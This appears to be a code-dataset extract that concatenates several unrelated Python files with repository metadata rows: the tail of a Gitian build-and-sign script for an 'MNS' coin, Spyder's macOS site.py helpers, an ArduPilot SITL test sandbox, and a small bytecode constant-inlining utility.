if not os.path.isdir('MNS'):
subprocess.check_call(['git', 'clone', 'https://github.com/MNS-Project/MNS.git'])
os.chdir('gitian-builder')
make_image_prog = ['bin/make-base-vm', '--suite', 'bionic', '--arch', 'amd64']
if args.docker:
make_image_prog += ['--docker']
elif not args.kvm:
make_image_prog += ['--lxc']
subprocess.check_call(make_image_prog)
os.chdir(workdir)
if args.is_bionic and not args.kvm and not args.docker:
subprocess.check_call(['sudo', 'sed', '-i', 's/lxcbr0/br0/', '/etc/default/lxc-net'])
print('Reboot is required')
exit(0)
def build():
global args, workdir
os.makedirs('MNS-binaries/' + args.version, exist_ok=True)
print('\nBuilding Dependencies\n')
os.chdir('gitian-builder')
os.makedirs('inputs', exist_ok=True)
subprocess.check_call(['wget', '-N', '-P', 'inputs', 'http://downloads.sourceforge.net/project/osslsigncode/osslsigncode/osslsigncode-1.7.1.tar.gz'])
subprocess.check_call(['wget', '-N', '-P', 'inputs', 'https://bitcoincore.org/cfields/osslsigncode-Backports-to-1.7.1.patch'])
subprocess.check_call(['make', '-C', '../MNS/depends', 'download', 'SOURCES_PATH=' + os.getcwd() + '/cache/common'])
if args.linux:
print('\nCompiling ' + args.version + ' Linux')
subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'mnscoin='+args.commit, '--url', 'mnscoin='+args.url, '../MNS/contrib/gitian-descriptors/gitian-linux.yml'])
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-linux', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-linux.yml'])
subprocess.check_call('mv build/out/mnscoin-*.tar.gz build/out/src/mnscoin-*.tar.gz ../MNS-binaries/'+args.version, shell=True)
if args.windows:
print('\nCompiling ' + args.version + ' Windows')
subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'mnscoin='+args.commit, '--url', 'mnscoin='+args.url, '../MNS/contrib/gitian-descriptors/gitian-win.yml'])
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-win-unsigned', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-win.yml'])
subprocess.check_call('mv build/out/mnscoin-*-win-unsigned.tar.gz inputs/', shell=True)
subprocess.check_call('mv build/out/mnscoin-*.zip build/out/mnscoin-*.exe ../MNS-binaries/'+args.version, shell=True)
if args.macos:
print('\nCompiling ' + args.version + ' MacOS')
subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'mnscoin='+args.commit, '--url', 'mnscoin='+args.url, '../MNS/contrib/gitian-descriptors/gitian-osx.yml'])
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-osx-unsigned', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-osx.yml'])
subprocess.check_call('mv build/out/mnscoin-*-osx-unsigned.tar.gz inputs/', shell=True)
subprocess.check_call('mv build/out/mnscoin-*.tar.gz build/out/mnscoin-*.dmg ../MNS-binaries/'+args.version, shell=True)
os.chdir(workdir)
if args.commit_files:
print('\nCommitting '+args.version+' Unsigned Sigs\n')
os.chdir('gitian.sigs')
subprocess.check_call(['git', 'config', 'user.signingkey', args.signer])
if args.linux:
subprocess.check_call(['git', 'add', args.version+'-linux/'+args.signer])
if args.windows:
subprocess.check_call(['git', 'add', args.version+'-win-unsigned/'+args.signer])
if args.macos:
subprocess.check_call(['git', 'add', args.version+'-osx-unsigned/'+args.signer])
subprocess.check_call(['git', 'commit', '-m', 'Add '+args.version+' unsigned sigs for '+args.signer])
os.chdir(workdir)
def sign():
global args, workdir
os.chdir('gitian-builder')
if args.windows:
print('\nSigning ' + args.version + ' Windows')
subprocess.check_call('cp inputs/MNS-' + args.version + '-win-unsigned.tar.gz inputs/MNS-win-unsigned.tar.gz', shell=True)
subprocess.check_call(['bin/gbuild', '-i', '--commit', 'signature='+args.commit, '../MNS/contrib/gitian-descriptors/gitian-win-signer.yml'])
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-win-signed', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-win-signer.yml'])
subprocess.check_call('mv build/out/mnscoin-*win64-setup.exe ../MNS-binaries/'+args.version, shell=True)
subprocess.check_call('mv build/out/mnscoin-*win32-setup.exe ../MNS-binaries/'+args.version, shell=True)
if args.macos:
print('\nSigning ' + args.version + ' MacOS')
subprocess.check_call('cp inputs/MNS-' + args.version + '-osx-unsigned.tar.gz inputs/MNS-osx-unsigned.tar.gz', shell=True)
subprocess.check_call(['bin/gbuild', '-i', '--commit', 'signature='+args.commit, '../MNS/contrib/gitian-descriptors/gitian-osx-signer.yml'])
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-osx-signed', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-osx-signer.yml'])
subprocess.check_call('mv build/out/mnscoin-osx-signed.dmg ../MNS-binaries/'+args.version+'/MNS-'+args.version+'-osx.dmg', shell=True)
os.chdir(workdir)
if args.commit_files:
print('\nCommitting '+args.version+' Signed Sigs\n')
os.chdir('gitian.sigs')
if args.windows:
subprocess.check_call(['git', 'add', args.version+'-win-signed/'+args.signer])
if args.macos:
subprocess.check_call(['git', 'add', args.version+'-osx-signed/'+args.signer])
subprocess.check_call(['git', 'commit', '-S', '-m', 'Add '+args.version+' signed binary sigs for '+args.signer])
os.chdir(workdir)
def verify():
global args, workdir
os.chdir('gitian-builder')
if args.linux:
print('\nVerifying v'+args.version+' Linux\n')
subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-linux', '../MNS/contrib/gitian-descriptors/gitian-linux.yml'])
print('\nVerifying v'+args.version+' Linux\n')
subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-linux', '../MNS/contrib/gitian-descriptors/gitian-linux.yml'])
if args.windows:
print('\nVerifying v'+args.version+' Windows\n')
subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-win-unsigned', '../MNS/contrib/gitian-descriptors/gitian-win.yml'])
if args.sign:
print('\nVerifying v'+args.version+' Signed Windows\n')
subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-win-signed', '../MNS/contrib/gitian-descriptors/gitian-win-signer.yml'])
if args.macos:
print('\nVerifying v'+args.version+' MacOS\n')
subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-osx-unsigned', '../MNS/contrib/gitian-descriptors/gitian-osx.yml'])
if args.sign:
print('\nVerifying v'+args.version+' Signed MacOS\n')
subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-osx-signed', '../MNS/contrib/gitian-descriptors/gitian-osx-signer.yml'])
os.chdir(workdir)
def main():
global args, workdir
parser = argparse.ArgumentParser(usage='%(prog)s [options] signer version')
parser.add_argument('-c', '--commit', action='store_true', dest='commit', help='Indicate that the version argument is for a commit or branch')
parser.add_argument('-p', '--pull', action='store_true', dest='pull', help='Indicate that the version argument is the number of a github repository pull request')
parser.add_argument('-u', '--url', dest='url', default='https://github.com/MNS-Project/MNS', help='Specify the URL of the repository. Default is %(default)s')
parser.add_argument('-v', '--verify', action='store_true', dest='verify', help='Verify the Gitian build')
parser.add_argument('-b', '--build', action='store_true', dest='build', help='Do a Gitian build')
parser.add_argument('-s', '--sign', action='store_true', dest='sign', help='Make signed binaries for Windows and MacOS')
parser.add_argument('-B', '--buildsign', action='store_true', dest='buildsign', help='Build both signed and unsigned binaries')
parser.add_argument('-o', '--os', dest='os', default='lwm', help='Specify which Operating Systems the build is for. Default is %(default)s. l for Linux, w for Windows, m for MacOS')
parser.add_argument('-j', '--jobs', dest='jobs', default='2', help='Number of processes to use. Default %(default)s')
parser.add_argument('-m', '--memory', dest='memory', default='2000', help='Memory to allocate in MiB. Default %(default)s')
parser.add_argument('-k', '--kvm', action='store_true', dest='kvm', help='Use KVM instead of LXC')
parser.add_argument('-d', '--docker', action='store_true', dest='docker', help='Use Docker instead of LXC')
parser.add_argument('-S', '--setup', action='store_true', dest='setup', help='Set up the Gitian building environment. Uses LXC. If you want to use KVM, use the --kvm option. Only works on Debian-based systems (Ubuntu, Debian)')
parser.add_argument('-D', '--detach-sign', action='store_true', dest='detach_sign', help='Create the assert file for detached signing. Will not commit anything.')
parser.add_argument('-n', '--no-commit', action='store_false', dest='commit_files', help='Do not commit anything to git')
parser.add_argument('signer', help='GPG signer to sign each build assert file')
parser.add_argument('version', help='Version number, commit, or branch to build. If building a commit or branch, the -c option must be specified')
args = parser.parse_args()
workdir = os.getcwd()
args.linux = 'l' in args.os
args.windows = 'w' in args.os
args.macos = 'm' in args.os
args.is_bionic = b'bionic' in subprocess.check_output(['lsb_release', '-cs'])
if args.buildsign:
args.build=True
args.sign=True
if args.kvm and args.docker:
raise Exception('Error: cannot have both kvm and docker')
args.sign_prog = 'true' if args.detach_sign else 'gpg --detach-sign'
# Set environment variable USE_LXC or USE_DOCKER, let gitian-builder know that we use lxc or docker
if args.docker:
os.environ['USE_DOCKER'] = '1'
elif not args.kvm:
os.environ['USE_LXC'] = '1'
if not 'GITIAN_HOST_IP' in os.environ.keys():
os.environ['GITIAN_HOST_IP'] = '10.0.3.1'
if not 'LXC_GUEST_IP' in os.environ.keys():
os.environ['LXC_GUEST_IP'] = '10.0.3.5'
# Disable for MacOS if no SDK found
if args.macos and not os.path.isfile('gitian-builder/inputs/MacOSX10.11.sdk.tar.gz'):
print('Cannot build for MacOS, SDK does not exist. Will build for other OSes')
args.macos = False
script_name = os.path.basename(sys.argv[0])
# Signer and version shouldn't be empty
if args.signer == '':
print(script_name+': Missing signer.')
print('Try '+script_name+' --help for more information')
exit(1)
if args.version == '':
print(script_name+': Missing version.')
print('Try '+script_name+' --help for more information')
exit(1)
# Add leading 'v' for tags
if args.commit and args.pull:
raise Exception('Cannot have both commit and pull')
args.commit = ('' if args.commit else 'v') + args.version
if args.setup:
setup()
os.chdir('MNS')
if args.pull:
subprocess.check_call(['git', 'fetch', args.url, 'refs/pull/'+args.version+'/merge'])
os.chdir('../gitian-builder/inputs/MNS')
subprocess.check_call(['git', 'fetch', args.url, 'refs/pull/'+args.version+'/merge'])
args.commit = subprocess.check_output(['git', 'show', '-s', '--format=%H', 'FETCH_HEAD'], universal_newlines=True, encoding='utf8').strip()
args.version = 'pull-' + args.version
print(args.commit)
subprocess.check_call(['git', 'fetch'])
subprocess.check_call(['git', 'checkout', args.commit])
os.chdir(workdir)
if args.build:
build()
if args.sign:
sign()
if args.verify:
verify()
if __name__ == '__main__':
main()
| 55.995984 | 231 | 0.641827 |
5f0c43252f772ee693e18243169f841597ff88c9 | 4,823 | py | Python | spyderlib/widgets/externalshell/osx_app_site.py | SylvainCorlay/spyder | b87bfa08abd53e1c97b59feeb51f665f6a632415 | [
"MIT"
] | 2 | 2016-01-23T11:52:24.000Z | 2021-04-27T03:52:25.000Z | spyder/widgets/externalshell/osx_app_site.py | ShenggaoZhu/spyder | 3556172888d8bb5dcc5f735676868a0d78d7d604 | [
"MIT"
] | null | null | null | spyder/widgets/externalshell/osx_app_site.py | ShenggaoZhu/spyder | 3556172888d8bb5dcc5f735676868a0d78d7d604 | [
"MIT"
] | null | null | null | #
# IMPORTANT NOTE: Don't add a coding line here! It's not necessary for
# site files
#
# Spyder's MacOS X App site.py additions
#
# It includes missing variables and paths that are not added by
# py2app to its own site.py
#
# These functions were taken verbatim from Python 2.7.3 site.py
#
import sys
import os
try:
import __builtin__ as builtins
except ImportError:
# Python 3
import builtins
# for distutils.commands.install
# These values are initialized by the getuserbase() and getusersitepackages()
# functions.
USER_SITE = None
USER_BASE = None
def getuserbase():
"""Returns the `user base` directory path.
The `user base` directory can be used to store data. If the global
variable ``USER_BASE`` is not initialized yet, this function will also set
it.
"""
global USER_BASE
if USER_BASE is not None:
return USER_BASE
from sysconfig import get_config_var
USER_BASE = get_config_var('userbase')
return USER_BASE
def getusersitepackages():
"""Returns the user-specific site-packages directory path.
If the global variable ``USER_SITE`` is not initialized yet, this
function will also set it.
"""
global USER_SITE
user_base = getuserbase() # this will also set USER_BASE
if USER_SITE is not None:
return USER_SITE
from sysconfig import get_path
if sys.platform == 'darwin':
from sysconfig import get_config_var
if get_config_var('PYTHONFRAMEWORK'):
USER_SITE = get_path('purelib', 'osx_framework_user')
return USER_SITE
USER_SITE = get_path('purelib', '%s_user' % os.name)
return USER_SITE
class _Printer(object):
"""interactive prompt objects for printing the license text, a list of
contributors and the copyright notice."""
MAXLINES = 23
def __init__(self, name, data, files=(), dirs=()):
self.__name = name
self.__data = data
self.__files = files
self.__dirs = dirs
self.__lines = None
def __setup(self):
if self.__lines:
return
data = None
for dir in self.__dirs:
for filename in self.__files:
filename = os.path.join(dir, filename)
try:
fp = open(filename, "rU")
data = fp.read()
fp.close()
break
except IOError:
pass
if data:
break
if not data:
data = self.__data
self.__lines = data.split('\n')
self.__linecnt = len(self.__lines)
def __repr__(self):
self.__setup()
if len(self.__lines) <= self.MAXLINES:
return "\n".join(self.__lines)
else:
return "Type %s() to see the full %s text" % ((self.__name,)*2)
def __call__(self):
self.__setup()
prompt = 'Hit Return for more, or q (and Return) to quit: '
lineno = 0
while 1:
try:
for i in range(lineno, lineno + self.MAXLINES):
print(self.__lines[i])
except IndexError:
break
else:
lineno += self.MAXLINES
key = None
while key is None:
try:
key = raw_input(prompt)
except NameError:
# Python 3
key = input(prompt)
if key not in ('', 'q'):
key = None
if key == 'q':
break
def setcopyright():
"""Set 'copyright' and 'credits' in builtins"""
builtins.copyright = _Printer("copyright", sys.copyright)
if sys.platform[:4] == 'java':
builtins.credits = _Printer(
"credits",
"Jython is maintained by the Jython developers (www.jython.org).")
else:
builtins.credits = _Printer("credits", """\
Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands
for supporting Python development. See www.python.org for more information.""")
here = os.path.dirname(os.__file__)
builtins.license = _Printer(
"license", "See http://www.python.org/%.3s/license.html" % sys.version,
["LICENSE.txt", "LICENSE"],
[os.path.join(here, os.pardir), here, os.curdir])
class _Helper(object):
"""Define the builtin 'help'.
This is a wrapper around pydoc.help (with a twist).
"""
def __repr__(self):
return "Type help() for interactive help, " \
"or help(object) for help about object."
def __call__(self, *args, **kwds):
import pydoc
return pydoc.help(*args, **kwds)
def sethelper():
builtins.help = _Helper()
| 29.408537 | 84 | 0.576405 |
0968ec6137cebff5770a91618e0f67f3705a5ccf | 19,822 | py | Python | houston/ardu/sandbox.py | squaresLab/Houston | 088cb52fe2d36dfb25b03b98f51b09d56f7d47d0 | [
"MIT"
] | 3 | 2018-11-12T08:04:27.000Z | 2021-12-01T11:25:33.000Z | houston/ardu/sandbox.py | ChrisTimperley/ros_mission_sim | 088cb52fe2d36dfb25b03b98f51b09d56f7d47d0 | [
"MIT"
] | 220 | 2017-10-02T19:49:10.000Z | 2019-08-01T22:08:01.000Z | houston/ardu/sandbox.py | ChrisTimperley/ros_mission_sim | 088cb52fe2d36dfb25b03b98f51b09d56f7d47d0 | [
"MIT"
] | 2 | 2018-10-04T21:03:58.000Z | 2018-10-08T13:33:56.000Z | from typing import Optional, Sequence
import time
import shlex
from timeit import default_timer as timer
import os
import sys
import threading
import logging
import docker
import dronekit
from bugzoo.client import Client as BugZooClient
from pymavlink import mavutil
from .home import HomeLocation
from .connection import CommandLong, MAVLinkConnection, MAVLinkMessage
from ..util import Stopwatch
from ..sandbox import Sandbox as BaseSandbox
from ..command import Command, CommandOutcome
from ..connection import Message
from ..mission import MissionOutcome
from ..trace import MissionTrace, CommandTrace, TraceRecorder
from ..exceptions import NoConnectionError, \
ConnectionLostError, \
PostConnectionSetupFailed, \
VehicleNotReadyError
logger = logging.getLogger(__name__) # type: logging.Logger
logger.setLevel(logging.DEBUG)
TIME_LOST_CONNECTION = 5.0
def detect_lost_connection(f):
"""
Decorates a given function such that any dronekit APIExceptions
encountered during the execution of that function will be caught and thrown
as ConnectionLostError exceptions.
"""
def wrapped(*args, **kwargs):
try:
return f(*args, **kwargs)
except dronekit.APIException:
raise ConnectionLostError
return wrapped
class Sandbox(BaseSandbox):
def __init__(self,
*args,
home: Optional[HomeLocation] = None,
**kwargs
) -> None:
super().__init__(*args, **kwargs)
self.__connection = None
self.__sitl_thread = None
self.__fn_log = None # type: Optional[str]
if home:
self.__home = home
else:
self.__home = HomeLocation(latitude=-35.362938,
longitude=149.165085,
altitude=584,
heading=270)
@property
def home(self) -> HomeLocation:
return self.__home
@property
def connection(self,
raise_exception: bool = True
) -> Optional[dronekit.Vehicle]:
"""
Uses dronekit to return a connection to the system running inside
this sandbox.
Raises:
NoConnectionError: if there is no connection to the system running
inside this sandbox.
"""
if self.__connection is None and raise_exception:
raise NoConnectionError()
return self.__connection
def has_connection(self) -> bool:
"""
Checks whether a connection to the system running inside this
sandbox exists.
"""
return self.__connection is not None
@property
def vehicle(self,
raise_exception: bool = True
) -> Optional[dronekit.Vehicle]:
if not self.has_connection() and raise_exception:
raise NoConnectionError()
return self.connection.conn
def read_logs(self) -> str:
"""
Reads the contents of the log file for this sandbox.
"""
assert self.__fn_log, "no log file created for sandbox."
return self._bugzoo.files.read(self.container, self.__fn_log)
def update(self, message: Message) -> None:
with self.__state_lock:
state = self.__state.evolve(message,
self.running_time,
self.connection)
self.__state = state
if self.recorder:
self.recorder.record_state(state)
self.recorder.record_message(message)
def _launch_sitl(self,
name_bin: str = 'ardurover',
name_model: str = 'rover',
fn_param: str = '', # FIXME what are the semantics of an empty string? # noqa: pycodestyle
verbose: bool = True
) -> None:
"""
Launches the SITL inside the sandbox and blocks until its execution
has finished.
"""
bzc = self._bugzoo.containers
# generate a temporary log file for the SITL
self.__fn_log = bzc.mktemp(self.container)
logger.debug("writing SITL output to: %s", self.__fn_log)
name_bin = os.path.join("/opt/ardupilot/build/sitl/bin", # FIXME
name_bin)
speedup = self.configuration.speedup
home = str(self.home)
cmd = '{} --model "{}" --speedup "{}" --home "{}" --defaults "{}"'
cmd = cmd.format(name_bin, name_model, speedup, home, fn_param)
cmd = '{} >& {}'.format(cmd, shlex.quote(self.__fn_log))
# add SITL prefix
cmd = '{} {}'.format(self.prefix, cmd)
logger.debug("launching SITL via: %s", cmd)
# FIXME add non-blocking execution to BugZoo client API
cmd = 'source /.environment && {}'.format(cmd)
cmd = "/bin/bash -c {}".format(shlex.quote(cmd))
logger.debug("wrapped command: %s", cmd)
docker_client = docker.from_env() # FIXME
docker_api = docker_client.api
resp = docker_api.exec_create(self.container.id,
cmd,
tty=True,
stdout=True,
stderr=True)
output = docker_api.exec_start(resp['Id'], stream=verbose)
logger.debug("started SITL")
if verbose:
for line in output:
line = line.decode(sys.stdout.encoding).rstrip('\n')
logger.getChild('SITL').debug(line)
logger.debug("SITL finished")
@detect_lost_connection
def start(self,
binary_name: str,
model_name: str,
param_file: str,
verbose: bool = True
) -> None:
"""
Launches the SITL inside this sandbox, and establishes a connection to
the vehicle running inside the simulation. Blocks until SITL is
launched and a connection is established.
Raises:
NoConnectionError: if a connection cannot be established.
ConnectionLostError: if the connecton is lost before the vehicle
is ready to receive commands.
PostConnectionSetupFailed: if the post-connection setup phase
failed.
VehicleNotReadyError: if a timeout occurred before the vehicle was
ready to accept commands.
"""
stopwatch = Stopwatch()
speedup = self.configuration.speedup
timeout_set_mode = (15 / speedup + 2) + 30
timeout_3d_fix = (10 / speedup + 2) + 30
timeout_state = (90 / speedup + 2) + 30
timeout_mavlink = 60
bzc = self._bugzoo.containers
args = (binary_name, model_name, param_file, verbose)
self.__sitl_thread = threading.Thread(target=self._launch_sitl,
args=args)
self.__sitl_thread.daemon = True
self.__sitl_thread.start()
# establish connection
protocol = 'tcp'
port = 5760
ip = str(bzc.ip_address(self.container))
url = "{}:{}:{}".format(protocol, ip, port)
logger.debug("connecting to SITL at %s", url)
try:
self.__connection = MAVLinkConnection(url,
{'update': self.update},
timeout=timeout_mavlink)
except dronekit.APIException:
raise NoConnectionError
# wait for longitude and latitude to match their expected values, and
# for the system to match the expected `armable` state.
initial_lon = self.state_initial['longitude']
initial_lat = self.state_initial['latitude']
initial_armable = self.state_initial['armable']
v = self.state_initial.__class__.variables
# FIXME wait for 3D fix
time.sleep(timeout_3d_fix)
stopwatch.reset()
stopwatch.start()
while True:
ready_lon = v['longitude'].eq(initial_lon, self.state['longitude'])
ready_lat = v['latitude'].eq(initial_lat, self.state['latitude'])
ready_armable = self.state['armable'] == initial_armable
if ready_lon and ready_lat and ready_armable:
break
if stopwatch.duration > timeout_state:
logger.error("latitude should be [%f] but was [%f]",
initial_lat, self.state['latitude'])
logger.error("longitude should be [%f] but was [%f]",
initial_lon, self.state['longitude'])
logger.error("armable should be [%s] but was [%s]",
initial_armable, self.state['armable'])
raise VehicleNotReadyError
time.sleep(0.05)
if not self._on_connected():
raise PostConnectionSetupFailed
# wait until the vehicle is in GUIDED mode
guided_mode = dronekit.VehicleMode('GUIDED')
self.vehicle.mode = guided_mode
stopwatch.reset()
stopwatch.start()
while self.vehicle.mode != guided_mode:
if stopwatch.duration > timeout_set_mode:
logger.error('vehicle is not in guided mode')
raise VehicleNotReadyError
time.sleep(0.05)
def stop(self) -> None:
logger.debug("Stopping SITL")
bzc = self._bugzoo.containers
if self.has_connection():
self.connection.close()
ps_cmd = 'ps aux | grep -i sitl | awk {\'"\'"\'print $2,$11\'"\'"\'}'
out = bzc.command(self.container, ps_cmd)
all_processes = out.output.splitlines()
logger.debug("checking list of processes: %s", str(all_processes))
for p in all_processes:
if not p:
continue
pid, cmd = p.split(' ')
is_sitl = cmd.startswith('/opt/ardupilot')
if not is_sitl and self.prefix:
is_sitl = cmd.startswith(self.prefix.split(' ')[0])
logger.debug("cmd [%s]: %s", is_sitl, cmd)
if is_sitl:
bzc.command(self.container, "kill -2 {}".format(pid))
logger.debug("killed process: %s", pid)
break
logger.debug("Killed it")
logger.debug("Joining thread")
self.__sitl_thread.join()
logger.debug("Joined")
# cmd = 'ps aux | grep -i sitl | awk {\'"\'"\'print $2\'"\'"\'} | xargs kill -2' # noqa: pycodestyle
# bzc.command(self.container, cmd, stdout=False, stderr=False)
def _on_connected(self) -> bool:
"""
Called immediately after a connection to the vehicle is established.
"""
return True
@detect_lost_connection
def run_and_trace(self,
commands: Sequence[Command],
collect_coverage: bool = False
) -> 'MissionTrace':
"""
Executes a mission, represented as a sequence of commands, and
returns a description of the outcome.
Parameters:
commands: the list of commands to be sent to the robot as
a mission.
collect_coverage: indicates whether or not coverage information
should be incorporated into the trace. If True (i.e., coverage
collection is enabled), this function expects the sandbox to be
properly instrumented.
Returns:
a trace describing the execution of a sequence of commands.
"""
config = self.configuration
env = self.environment
speedup = config.speedup
timeout_command = 300 / speedup + 5
timeout_arm = 10 / speedup + 5
timeout_mission_upload = 20
# the number of seconds for the delay added after DO commands
do_delay = max(4, int(20 / speedup))
with self.__lock:
outcomes = [] # type: List[CommandOutcome]
passed = True
connection_lost = threading.Event()
# FIXME The initial command should be based on initial state
initial = dronekit.Command(0, 0, 0,
0, 16, 0, 0,
0.0, 0.0, 0.0, 0.0,
-35.3632607, 149.1652351, 584)
# delay to allow the robot to reach its stable state
delay = dronekit.Command(0, 0, 0,
3, 93, 0, 0,
do_delay, -1, -1, -1,
0, 0, 0)
# converting from Houston commands to dronekit commands
dronekitcmd_to_cmd_mapping = {}
cmds = [initial]
for i, cmd in enumerate(commands):
dronekitcmd_to_cmd_mapping[len(cmds)] = i
cmds.append(cmd.to_message().to_dronekit_command())
# DO commands trigger some action and return.
# we add a delay after them to see how they affect the state.
if 'MAV_CMD_DO_' in cmd.__class__.uid:
dronekitcmd_to_cmd_mapping[len(cmds)] = i
cmds.append(delay)
logger.debug("Final mission commands len: %d, mapping: %s",
len(cmds), dronekitcmd_to_cmd_mapping)
# uploading the mission to the vehicle
vcmds = self.vehicle.commands
vcmds.clear()
for cmd in cmds:
vcmds.add(cmd)
vcmds.upload(timeout=timeout_mission_upload)
logger.debug("Mission uploaded")
vcmds.wait_ready()
# maps each wp to the final state and time when wp was reached
wp_to_state = {} # Dict[int, Tuple[State, float]]
# [wp that has last been reached, wp running at the moment]
last_wp = [0, 0]
# used to synchronize rw to last_wp
wp_lock = threading.Lock()
# is set whenever a command in mission is done
wp_event = threading.Event()
# NOTE dronekit connection must not use its own heartbeat checking
def heartbeat_listener(_, __, value):
if value > TIME_LOST_CONNECTION:
connection_lost.set()
wp_event.set()
self.vehicle.add_attribute_listener('last_heartbeat',
heartbeat_listener)
def check_for_reached(m):
name = m.name
message = m.message
if name == 'MISSION_ITEM_REACHED':
logger.debug("**MISSION_ITEM_REACHED: %d", message.seq)
if message.seq == len(cmds) - 1:
logger.info("Last item reached")
with wp_lock:
last_wp[1] = int(message.seq) + 1
wp_event.set()
elif name == 'MISSION_CURRENT':
logger.debug("**MISSION_CURRENT: %d", message.seq)
logger.debug("STATE: {}".format(self.state))
if message.seq > last_wp[1]:
with wp_lock:
if message.seq > last_wp[0]:
last_wp[1] = message.seq
logger.debug("SET EVENT")
wp_event.set()
elif name == 'MISSION_ACK':
logger.debug("**MISSION_ACK: %s", message.type)
self.connection.add_hooks({'check_for_reached': check_for_reached})
stopwatch = Stopwatch()
stopwatch.start()
self.vehicle.armed = True
while not self.vehicle.armed:
if stopwatch.duration >= timeout_arm:
raise VehicleNotReadyError
logger.debug("waiting for the rover to be armed...")
self.vehicle.armed = True
time.sleep(0.1)
# starting the mission
self.vehicle.mode = dronekit.VehicleMode("AUTO")
initial_state = self.state
start_message = CommandLong(
0, 0, 300, 0, 1, len(cmds) + 1, 0, 0, 0, 0, 4)
self.connection.send(start_message)
logger.debug("sent mission start message to vehicle")
time_start = timer()
wp_to_traces = {}
with self.record() as recorder:
while last_wp[0] <= len(cmds) - 1:
logger.debug("waiting for command")
not_reached_timeout = wp_event.wait(timeout_command)
logger.debug("Event set %s", last_wp)
if not not_reached_timeout:
logger.error("Timeout occured %d", last_wp[0])
break
if connection_lost.is_set():
logger.error("Connection to vehicle was lost.")
raise ConnectionLostError
with wp_lock:
# self.observe()
logger.info("last_wp: %s len: %d",
str(last_wp),
len(cmds))
logger.debug("STATE: {}".format(self.state))
current_time = timer()
time_passed = current_time - time_start
time_start = current_time
states, messages = recorder.flush()
if last_wp[0] > 0:
cmd_index = dronekitcmd_to_cmd_mapping[last_wp[0]]
wp_to_state[cmd_index] = (self.state, time_passed)
cmd = commands[cmd_index]
trace = CommandTrace(cmd, states)
wp_to_traces[cmd_index] = trace
last_wp[0] = last_wp[1]
wp_event.clear()
self.connection.remove_hook('check_for_reached')
logger.debug("Removed hook")
coverage = None
if collect_coverage:
# if appropriate, store coverage files
self.__flush_coverage()
coverage = self.__get_coverage()
traces = [wp_to_traces[k] for k in sorted(wp_to_traces.keys())]
return MissionTrace(tuple(traces), coverage)
def __get_coverage(self) -> "FileLineSet":
"""
Copies gcda files from /tmp/<directory> to /opt/ardupilot
(where the source code is) and collects coverage results.
"""
bzc = self._bugzoo.containers
coverage = bzc.extract_coverage(self.container)
return coverage
def __flush_coverage(self) -> None:
"""
Sends a SIGUSR1 signal to ardupilot processes running in the
container. They will flush gcov data into gcda files that
will be copied to /tmp/<directory> for later use.
"""
bzc = self._bugzoo.containers
ps_cmd = 'ps aux | grep -i sitl | awk {\'"\'"\'print $2,$11\'"\'"\'}'
out = bzc.command(self.container, ps_cmd)
all_processes = out.output.splitlines()
logger.debug("checking list of processes: %s", str(all_processes))
for p in all_processes:
if not p:
continue
pid, cmd = p.split(' ')
if cmd.startswith('/opt/ardupilot'):
bzc.command(self.container, "kill -10 {}".format(pid))
break
| 40.288618 | 113 | 0.542478 |
e6d320262753c6cf71fcab56f2cbaf7c614ca985 | 1,653 | py | Python | engine/lib/asm/const_patcher.py | alexcher-im/sgemu | e85c6834b1057a27ba5c41c357c0de2336a12e2e | [
"Zlib"
] | 5 | 2020-10-24T12:39:52.000Z | 2021-04-04T22:47:44.000Z | engine/lib/asm/const_patcher.py | alexcher-im/sgemu | e85c6834b1057a27ba5c41c357c0de2336a12e2e | [
"Zlib"
] | null | null | null | engine/lib/asm/const_patcher.py | alexcher-im/sgemu | e85c6834b1057a27ba5c41c357c0de2336a12e2e | [
"Zlib"
] | null | null | null | import platform
from opcode import opmap
import numpy as np
SHOULD_DISABLE_ON_PYPY = True
_do_not_wrap = platform.python_implementation().lower() == 'pypy'
def wrap(inline=(), force=False):
return lambda func: _wrap(func, inline, force)
def _wrap(src_func, inline, force):
if not force and _do_not_wrap and SHOULD_DISABLE_ON_PYPY:
return src_func
code = src_func.__code__
code_class = (lambda: 0).__code__.__class__
function_class = (lambda: 0).__class__
new_const = list(code.co_consts)
new_code = bytearray(code.co_code)
const_ids = {}
for string, const in inline.items():
if string in code.co_names:
new_const.append(const)
const_ids[string] = len(new_const) - 1
for i in range(0, len(new_code), 2):
if new_code[i] == opmap['LOAD_GLOBAL']:
new_code[i] = opmap['LOAD_CONST']
current_obj_name = code.co_names[new_code[i + 1]]
new_code[i + 1] = const_ids[current_obj_name]
new_code_obj = code_class(code.co_argcount, code.co_kwonlyargcount, code.co_nlocals, code.co_stacksize,
code.co_flags, bytes(new_code), tuple(new_const), code.co_names, code.co_varnames,
code.co_filename, code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars,
code.co_cellvars)
new_func_obj = function_class(new_code_obj, src_func.__globals__, src_func.__name__)
return new_func_obj
if __name__ == '__main__':
@wrap(inline={'np': np})
def test_func():
b = np.empty(4)
return b
print(test_func())
